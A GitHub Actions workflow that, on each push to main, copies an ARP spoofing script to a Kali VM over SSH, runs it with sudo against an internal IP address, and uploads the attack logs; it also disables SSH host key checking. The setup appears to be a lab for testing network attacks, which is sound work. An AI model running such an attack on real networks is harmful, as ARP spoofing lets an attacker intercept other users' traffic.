name: Test SSH to Kali VM

on:
  push:
    branches:
      - main

jobs:
  ssh-test:
    runs-on: self-hosted
    steps:
      - name: SSH into Kali VM
        run: |
          ssh -o StrictHostKeyChecking=no rb@172.30.117.123 'ls -la'
        env:
          SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}

      - name: Deploy attack script to Kali machine
        run: |
          scp arp_spoof.sh kali@172.30.117.123:/home/kali/
          ssh kali@172.30.117.123 "chmod +x /home/kali/arp_spoof.sh"

      - name: Execute ARP spoofing attack
        run: |
          ssh kali@172.30.117.123 "sudo /home/kali/arp_spoof.sh 172.30.124.62"

      - name: Collect and store results
        run: |
          ssh kali@172.30.117.123 "cat /home/kali/arp_attack_logs.txt" > attack_results.txt
          
      - name: Upload attack results
        uses: actions/upload-artifact@v4
        with:
          name: arp-spoof-results
          path: attack_results.txt
          retention-days: 5